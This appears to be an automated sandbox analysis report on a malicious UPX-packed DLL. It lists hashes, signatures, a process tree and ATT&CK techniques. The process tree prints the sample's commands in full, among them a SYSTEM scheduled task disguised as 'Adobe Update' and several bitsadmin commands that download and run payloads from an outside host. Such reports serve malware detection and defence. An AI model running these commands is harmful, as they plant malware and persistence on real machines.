ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82

General

Target

ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll
Size

176KB
MD5

942bd66e50cc3913d893427cce69bd89
SHA1

c4f78e708b2abacb172423c648e693b6ac63ff90
SHA256

ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82
SHA512

1888da78098e42e6736170e39b0b8efa73c30349ac722f8bcf7fcbd407d7a0d3cec4a4b982911a0658b49858bac28398b25318bca8b02370c098029096de97f5
SSDEEP

3072:/OJQOAhrqFlNZg+gvWUG2EPTCaRpLmRLukCTh+IWlT8FYxwtD+1C8Cl+SE7x:/OJy12Zg5REPT/Pi1CT4IWlZCYCl+hx

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1940-56-0x00000000002F0000-0x0000000000365000-memory.dmp	upx
behavioral1/memory/1940-72-0x00000000002F0000-0x0000000000365000-memory.dmp	upx

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

552 1940 WerFault.exe rundll32.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1772 schtasks.exe
Download via BitsAdmin 1 TTPs 4 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid process

1056 bitsadmin.exe
608 bitsadmin.exe
1716 bitsadmin.exe
1372 bitsadmin.exe

pid	pid_target	process	target process
552	1940	WerFault.exe	rundll32.exe

pid	process
1772	schtasks.exe

pid	process
1056	bitsadmin.exe
608	bitsadmin.exe
1716	bitsadmin.exe
1372	bitsadmin.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

rundll32.exerundll32.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1320 wrote to memory of 1940	1320	rundll32.exe	rundll32.exe
PID 1320 wrote to memory of 1940	1320	rundll32.exe	rundll32.exe
PID 1320 wrote to memory of 1940	1320	rundll32.exe	rundll32.exe
PID 1320 wrote to memory of 1940	1320	rundll32.exe	rundll32.exe
PID 1320 wrote to memory of 1940	1320	rundll32.exe	rundll32.exe
PID 1320 wrote to memory of 1940	1320	rundll32.exe	rundll32.exe
PID 1320 wrote to memory of 1940	1320	rundll32.exe	rundll32.exe
PID 1940 wrote to memory of 1840	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1840	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1840	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1840	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 532	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 532	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 532	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 532	1940	rundll32.exe	cmd.exe
PID 1840 wrote to memory of 1772	1840	cmd.exe	schtasks.exe
PID 1840 wrote to memory of 1772	1840	cmd.exe	schtasks.exe
PID 1840 wrote to memory of 1772	1840	cmd.exe	schtasks.exe
PID 1840 wrote to memory of 1772	1840	cmd.exe	schtasks.exe
PID 1940 wrote to memory of 1080	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1080	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1080	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1080	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1764	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1764	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1764	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 1764	1940	rundll32.exe	cmd.exe
PID 532 wrote to memory of 1056	532	cmd.exe	bitsadmin.exe
PID 532 wrote to memory of 1056	532	cmd.exe	bitsadmin.exe
PID 532 wrote to memory of 1056	532	cmd.exe	bitsadmin.exe
PID 532 wrote to memory of 1056	532	cmd.exe	bitsadmin.exe
PID 1080 wrote to memory of 608	1080	cmd.exe	bitsadmin.exe
PID 1080 wrote to memory of 608	1080	cmd.exe	bitsadmin.exe
PID 1080 wrote to memory of 608	1080	cmd.exe	bitsadmin.exe
PID 1080 wrote to memory of 608	1080	cmd.exe	bitsadmin.exe
PID 1940 wrote to memory of 304	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 304	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 304	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 304	1940	rundll32.exe	cmd.exe
PID 1940 wrote to memory of 552	1940	rundll32.exe	WerFault.exe
PID 1940 wrote to memory of 552	1940	rundll32.exe	WerFault.exe
PID 1940 wrote to memory of 552	1940	rundll32.exe	WerFault.exe
PID 1940 wrote to memory of 552	1940	rundll32.exe	WerFault.exe
PID 1764 wrote to memory of 1716	1764	cmd.exe	bitsadmin.exe
PID 1764 wrote to memory of 1716	1764	cmd.exe	bitsadmin.exe
PID 1764 wrote to memory of 1716	1764	cmd.exe	bitsadmin.exe
PID 1764 wrote to memory of 1716	1764	cmd.exe	bitsadmin.exe
PID 304 wrote to memory of 1372	304	cmd.exe	bitsadmin.exe
PID 304 wrote to memory of 1372	304	cmd.exe	bitsadmin.exe
PID 304 wrote to memory of 1372	304	cmd.exe	bitsadmin.exe
PID 304 wrote to memory of 1372	304	cmd.exe	bitsadmin.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll,#1
2⤵
- Suspicious use of WriteProcessMemory
PID:1940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg %TEMP%\b001.cpl &%TEMP%\b001.cpl" /ru SYSTEM /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg C:\Users\Admin\AppData\Local\Temp\b001.cpl &C:\Users\Admin\AppData\Local\Temp\b001.cpl" /ru SYSTEM /f
4⤵
- Creates scheduled task(s)
PID:1772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:532

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
4⤵
- Download via BitsAdmin
PID:1056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
3⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
4⤵
- Download via BitsAdmin
PID:608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
4⤵
- Download via BitsAdmin
PID:1716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
3⤵
- Suspicious use of WriteProcessMemory
PID:304

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
4⤵
- Download via BitsAdmin
PID:1372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 304
3⤵
- Program crash
PID:552

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

BITS Jobs

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/304-65-0x0000000000000000-mapping.dmp

Download
memory/532-58-0x0000000000000000-mapping.dmp

Download
memory/552-67-0x0000000000000000-mapping.dmp

Download
memory/608-63-0x0000000000000000-mapping.dmp

Download
memory/1056-62-0x0000000000000000-mapping.dmp

Download
memory/1080-60-0x0000000000000000-mapping.dmp

Download
memory/1372-69-0x0000000000000000-mapping.dmp

Download
memory/1716-68-0x0000000000000000-mapping.dmp

Download
memory/1764-61-0x0000000000000000-mapping.dmp

Download
memory/1772-59-0x0000000000000000-mapping.dmp

Download
memory/1840-57-0x0000000000000000-mapping.dmp

Download
memory/1940-54-0x0000000000000000-mapping.dmp

Download
memory/1940-56-0x00000000002F0000-0x0000000000365000-memory.dmp

Filesize
468KB

Download
memory/1940-55-0x00000000757C1000-0x00000000757C3000-memory.dmp

Filesize
8KB

Download
memory/1940-72-0x00000000002F0000-0x0000000000365000-memory.dmp

Filesize
468KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads